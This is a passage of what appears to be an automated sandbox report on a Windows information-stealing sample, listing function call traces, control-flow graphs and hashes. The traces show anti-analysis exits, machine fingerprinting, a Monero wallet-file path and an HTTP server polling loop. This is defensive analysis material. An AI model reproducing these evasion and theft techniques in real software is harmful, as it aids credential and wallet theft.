                            • GetProcAddress.KERNEL32(752C0000,00FA5870), ref: 0035A28D
                            • GetProcAddress.KERNEL32(74EC0000,00FABC28), ref: 0035A2B3
                            • GetProcAddress.KERNEL32(74EC0000,00FAB818), ref: 0035A2CB
                            • GetProcAddress.KERNEL32(74EC0000,00FBCF10), ref: 0035A2E3
                            • GetProcAddress.KERNEL32(74EC0000,00FA5690), ref: 0035A2FC
                            • GetProcAddress.KERNEL32(74EC0000,00FA5810), ref: 0035A314
                            • GetProcAddress.KERNEL32(74EC0000,00FABAE8), ref: 0035A32C
                            • GetProcAddress.KERNEL32(75BD0000,00FBCE98), ref: 0035A352
                            • GetProcAddress.KERNEL32(75BD0000,00FA58D0), ref: 0035A36A
                            • GetProcAddress.KERNEL32(75BD0000,00FB99B8), ref: 0035A382
                            • GetProcAddress.KERNEL32(75BD0000,00FBD030), ref: 0035A39B
                            • GetProcAddress.KERNEL32(75BD0000,00FBCDD8), ref: 0035A3B3
                            • GetProcAddress.KERNEL32(75BD0000,00FA5730), ref: 0035A3CB
                            • GetProcAddress.KERNEL32(75BD0000,00FA5790), ref: 0035A3E4
                            • GetProcAddress.KERNEL32(75BD0000,00FBCF40), ref: 0035A3FC
                            • GetProcAddress.KERNEL32(75BD0000,00FBD090), ref: 0035A414
                            • GetProcAddress.KERNEL32(75A70000,00FA5950), ref: 0035A436
                            • GetProcAddress.KERNEL32(75A70000,00FBCE50), ref: 0035A44E
                            • GetProcAddress.KERNEL32(75A70000,00FBCE68), ref: 0035A466
                            • GetProcAddress.KERNEL32(75A70000,00FBCE80), ref: 0035A47F
                            • GetProcAddress.KERNEL32(75A70000,00FBCEB0), ref: 0035A497
                            • GetProcAddress.KERNEL32(75450000,00FA5830), ref: 0035A4B8
                            • GetProcAddress.KERNEL32(75450000,00FA5890), ref: 0035A4D1
                            • GetProcAddress.KERNEL32(75DA0000,00FA56B0), ref: 0035A4F2
                            • GetProcAddress.KERNEL32(75DA0000,00FBCF70), ref: 0035A50A
                            • GetProcAddress.KERNEL32(6F070000,00FA5630), ref: 0035A530
                            • GetProcAddress.KERNEL32(6F070000,00FA58F0), ref: 0035A548
                            • GetProcAddress.KERNEL32(6F070000,00FA56D0), ref: 0035A560
                            • GetProcAddress.KERNEL32(6F070000,00FBCFA0), ref: 0035A579
                            • GetProcAddress.KERNEL32(6F070000,00FA56F0), ref: 0035A591
                            • GetProcAddress.KERNEL32(6F070000,00FA5990), ref: 0035A5A9
                            • GetProcAddress.KERNEL32(6F070000,00FA5910), ref: 0035A5C2
                            • GetProcAddress.KERNEL32(6F070000,00FA5750), ref: 0035A5DA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0035A5F1
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0035A607
                            • GetProcAddress.KERNEL32(75AF0000,00FBD318), ref: 0035A629
                            • GetProcAddress.KERNEL32(75AF0000,00FB9A28), ref: 0035A641
                            • GetProcAddress.KERNEL32(75AF0000,00FBD180), ref: 0035A659
                            • GetProcAddress.KERNEL32(75AF0000,00FBD270), ref: 0035A672
                            • GetProcAddress.KERNEL32(75D90000,00FA57B0), ref: 0035A693
                            • GetProcAddress.KERNEL32(6FAA0000,00FBD1B0), ref: 0035A6B4
                            • GetProcAddress.KERNEL32(6FAA0000,00FA5770), ref: 0035A6CD
                            • GetProcAddress.KERNEL32(6FAA0000,00FBD138), ref: 0035A6E5
                            • GetProcAddress.KERNEL32(6FAA0000,00FBD330), ref: 0035A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 81016bdce039d4f7afe0de30ded6eb0bc9ef79ed7973c29820d17aa901e3b369
                            • Instruction ID: 5f595d607e350146fb3b888d74f6efb0bef7f945ad9256e13b127d0814fd3ab6
                            • Opcode Fuzzy Hash: 81016bdce039d4f7afe0de30ded6eb0bc9ef79ed7973c29820d17aa901e3b369
                            • Instruction Fuzzy Hash: 2A627DB5500200AFF748DFA8ED8896637F9F76C701304A51BAE45E3225D739A45AFF22
                            Function 00346280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 346280-34630b call 35a7a0 call 3447b0 call 35a740 InternetOpenA StrCmpCA 1040 346314-346318 1033->1040 1041 34630d 1033->1041 1042 34631e-346342 InternetConnectA 1040->1042 1043 346509-346525 call 35a7a0 call 35a800 * 2 1040->1043 1041->1040 1044 3464ff-346503 InternetCloseHandle 1042->1044 1045 346348-34634c 1042->1045 1061 346528-34652d 1043->1061 1044->1043 1047 34634e-346358 1045->1047 1048 34635a 1045->1048 1050 346364-346392 HttpOpenRequestA 1047->1050 1048->1050 1052 3464f5-3464f9 InternetCloseHandle 1050->1052 1053 346398-34639c 1050->1053 1052->1044 1056 3463c5-346405 HttpSendRequestA HttpQueryInfoA 1053->1056 1057 34639e-3463bf InternetSetOptionA 1053->1057 1059 346407-346427 call 35a740 call 35a800 * 2 1056->1059 1060 34642c-34644b call 358940 1056->1060 1057->1056 1059->1061 1066 34644d-346454 1060->1066 1067 3464c9-3464e9 call 35a740 call 35a800 * 2 1060->1067 1070 346456-346480 InternetReadFile 1066->1070 1071 3464c7-3464ef InternetCloseHandle 1066->1071 1067->1061 1076 346482-346489 1070->1076 1077 34648b 1070->1077 1071->1052 1076->1077 1080 34648d-3464c5 call 35a9b0 call 35a8a0 call 35a800 1076->1080 1077->1071 1080->1070
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                              • Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
                            • StrCmpCA.SHLWAPI(?,00FBE858), ref: 00346303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
                            • HttpOpenRequestA.WININET(00000000,GET,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00346385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003463FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0034646D
                            • InternetCloseHandle.WININET(00000000), ref: 003464EF
                            • InternetCloseHandle.WININET(00000000), ref: 003464F9
                            • InternetCloseHandle.WININET(00000000), ref: 00346503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: f62ee5e4de6b2e0377c20a4b9cfa83d8a764446e5f330cbac4c2934790711eea
                            • Instruction ID: e4013ae3073bcc008fea48efc0b58e6e050673e7f22e39b3cd29034a2633060a
                            • Opcode Fuzzy Hash: f62ee5e4de6b2e0377c20a4b9cfa83d8a764446e5f330cbac4c2934790711eea
                            • Instruction Fuzzy Hash: 84714E71A00218ABEF15DF90CC46FEE77B8FB45701F108199F90A6B190DBB46A89DF52
                            Function 00355510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 355510-355577 call 355ad0 call 35a820 * 3 call 35a740 * 4 1106 35557c-355583 1090->1106 1107 355585-3555b6 call 35a820 call 35a7a0 call 341590 call 3551f0 1106->1107 1108 3555d7-35564c call 35a740 * 2 call 341590 call 3552c0 call 35a8a0 call 35a800 call 35aad0 StrCmpCA 1106->1108 1123 3555bb-3555d2 call 35a8a0 call 35a800 1107->1123 1134 355693-3556a9 call 35aad0 StrCmpCA 1108->1134 1138 35564e-35568e call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 1108->1138 1123->1134 1139 3557dc-355844 call 35a8a0 call 35a820 * 2 call 341670 call 35a800 * 4 call 356560 call 341550 1134->1139 1140 3556af-3556b6 1134->1140 1138->1134 1271 355ac3-355ac6 1139->1271 1142 3556bc-3556c3 1140->1142 1143 3557da-35585f call 35aad0 StrCmpCA 1140->1143 1146 3556c5-355719 call 35a820 call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 1142->1146 1147 35571e-355793 call 35a740 * 2 call 341590 call 3552c0 call 35a8a0 call 35a800 call 35aad0 StrCmpCA 1142->1147 1161 355865-35586c 1143->1161 1162 355991-3559f9 call 35a8a0 call 35a820 * 2 call 341670 call 35a800 * 4 call 356560 call 341550 1143->1162 1146->1143 1147->1143 1250 355795-3557d5 call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 1147->1250 1168 355872-355879 1161->1168 1169 35598f-355a14 call 35aad0 StrCmpCA 1161->1169 1162->1271 1175 3558d3-355948 call 35a740 * 2 call 341590 call 3552c0 call 35a8a0 call 35a800 call 35aad0 StrCmpCA 1168->1175 1176 35587b-3558ce call 35a820 call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 1168->1176 1198 355a16-355a21 Sleep 1169->1198 1199 355a28-355a91 call 35a8a0 call 35a820 * 2 call 341670 call 35a800 * 4 call 356560 call 341550 1169->1199 1175->1169 1274 35594a-35598a call 35a7a0 call 341590 call 3551f0 call 35a8a0 call 35a800 1175->1274 1176->1169 1198->1106 1199->1271 1250->1143 1274->1169
                            APIs
                              • Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
                              • Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003556A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355857
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355228
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 003552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355318
                              • Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 0035532F
                              • Part of subcall function 003552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00355364
                              • Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 00355383
                              • Part of subcall function 003552C0: lstrlen.KERNEL32(00000000), ref: 003553AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0035578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00355A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 49983f49efdf7dd5245fae67bfcb26aae5bbcb08fe34ad067251c660a390ab86
                            • Instruction ID: 6784a190b17e26556996cf15ab75efa8d34b5fb7953fa0129cf09f45acaad1f6
                            • Opcode Fuzzy Hash: 49983f49efdf7dd5245fae67bfcb26aae5bbcb08fe34ad067251c660a390ab86
                            • Instruction Fuzzy Hash: 3FE151719109049ADB16FBB0DC52EED7778AF54301F408629BD076A0B1EF346B4DEBA2
                            Function 003517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 3517a0-3517cd call 35aad0 StrCmpCA 1304 3517d7-3517f1 call 35aad0 1301->1304 1305 3517cf-3517d1 ExitProcess 1301->1305 1309 3517f4-3517f8 1304->1309 1310 3519c2-3519cd call 35a800 1309->1310 1311 3517fe-351811 1309->1311 1313 351817-35181a 1311->1313 1314 35199e-3519bd 1311->1314 1316 351835-351844 call 35a820 1313->1316 1317 3518f1-351902 StrCmpCA 1313->1317 1318 351951-351962 StrCmpCA 1313->1318 1319 351970-351981 StrCmpCA 1313->1319 1320 351913-351924 StrCmpCA 1313->1320 1321 351932-351943 StrCmpCA 1313->1321 1322 35185d-35186e StrCmpCA 1313->1322 1323 35187f-351890 StrCmpCA 1313->1323 1324 351821-351830 call 35a820 1313->1324 1325 3518ad-3518be StrCmpCA 1313->1325 1326 3518cf-3518e0 StrCmpCA 1313->1326 1327 35198f-351999 call 35a820 1313->1327 1328 351849-351858 call 35a820 1313->1328 1314->1309 1316->1314 1335 351904-351907 1317->1335 1336 35190e 1317->1336 1341 351964-351967 1318->1341 1342 35196e 1318->1342 1344 351983-351986 1319->1344 1345 35198d 1319->1345 1337 351926-351929 1320->1337 1338 351930 1320->1338 1339 351945-351948 1321->1339 1340 35194f 1321->1340 1350 351870-351873 1322->1350 1351 35187a 1322->1351 1329 351892-35189c 1323->1329 1330 35189e-3518a1 1323->1330 1324->1314 1331 3518c0-3518c3 1325->1331 1332 3518ca 1325->1332 1333 3518e2-3518e5 1326->1333 1334 3518ec 1326->1334 1327->1314 1328->1314 1352 3518a8 1329->1352 1330->1352 1331->1332 1332->1314 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1344->1345 1345->1314 1350->1351 1351->1314 1352->1314
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 003517C5
                            • ExitProcess.KERNEL32 ref: 003517D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 090d29fa267a90885c0bb8245a064c62ece835a573edf620fd7afda2858c9c58
                            • Instruction ID: cd5b47e6c37dc69991c05395eb67945fb28f69a873b24decf2b1f13aeaf3b107
                            • Opcode Fuzzy Hash: 090d29fa267a90885c0bb8245a064c62ece835a573edf620fd7afda2858c9c58
                            • Instruction Fuzzy Hash: F8517DB4A00209EFDB06DFA0D954FBE77B9BF44305F108149EC06AB260D770E949DBA2
                            Function 00357500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 357500-35754a GetWindowsDirectoryA 1357 357553-3575c7 GetVolumeInformationA call 358d00 * 3 1356->1357 1358 35754c 1356->1358 1365 3575d8-3575df 1357->1365 1358->1357 1366 3575e1-3575fa call 358d00 1365->1366 1367 3575fc-357617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 357619-357626 call 35a740 1367->1369 1370 357628-357658 wsprintfA call 35a740 1367->1370 1377 35767e-35768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00357542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0035757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0035760A
                            • wsprintfA.USER32 ref: 00357640
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$6
                            • API String ID: 1544550907-1570250246
                            • Opcode ID: 14e2577ab4503efef5197481779491e1420f8146ca8f02b7aa7cb7be705484e3
                            • Instruction ID: e7d75af0a8dad5e6672adc0dc126fe16b35dcfc26427bb85886183c1fed48ae2
                            • Opcode Fuzzy Hash: 14e2577ab4503efef5197481779491e1420f8146ca8f02b7aa7cb7be705484e3
                            • Instruction Fuzzy Hash: A84173B1D04258ABDB11DB94DC45FDEBBB8AB18701F100199F9057B290E7746A48CBA5
                            Function 003569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2C00), ref: 003598A1
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2AC8), ref: 003598BA
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2A20), ref: 003598D2
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2C18), ref: 003598EA
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2A80), ref: 00359903
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB98D8), ref: 0035991B
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FA5330), ref: 00359933
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FA5510), ref: 0035994C
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2B58), ref: 00359964
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2C30), ref: 0035997C
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2AF8), ref: 00359995
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2978), ref: 003599AD
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FA53D0), ref: 003599C5
                              • Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,00FB2B28), ref: 003599DE
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 003411D0: ExitProcess.KERNEL32 ref: 00341211
                              • Part of subcall function 00341160: GetSystemInfo.KERNEL32(?), ref: 0034116A
                              • Part of subcall function 00341160: ExitProcess.KERNEL32 ref: 0034117E
                              • Part of subcall function 00341110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0034112B
                              • Part of subcall function 00341110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00341132
                              • Part of subcall function 00341110: ExitProcess.KERNEL32 ref: 00341143
                              • Part of subcall function 00341220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0034123E
                              • Part of subcall function 00341220: __aulldiv.LIBCMT ref: 00341258
                              • Part of subcall function 00341220: __aulldiv.LIBCMT ref: 00341266
                              • Part of subcall function 00341220: ExitProcess.KERNEL32 ref: 00341294
                              • Part of subcall function 00356770: GetUserDefaultLangID.KERNEL32 ref: 00356774
                              • Part of subcall function 00341190: ExitProcess.KERNEL32 ref: 003411C6
                              • Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
                              • Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
                              • Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F
                              • Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
                              • Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
                              • Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FB9A18,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00356AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00356AF9
                            • Sleep.KERNEL32(00001770), ref: 00356B04
                            • CloseHandle.KERNEL32(?,00000000,?,00FB9A18,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356B1A
                            • ExitProcess.KERNEL32 ref: 00356B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
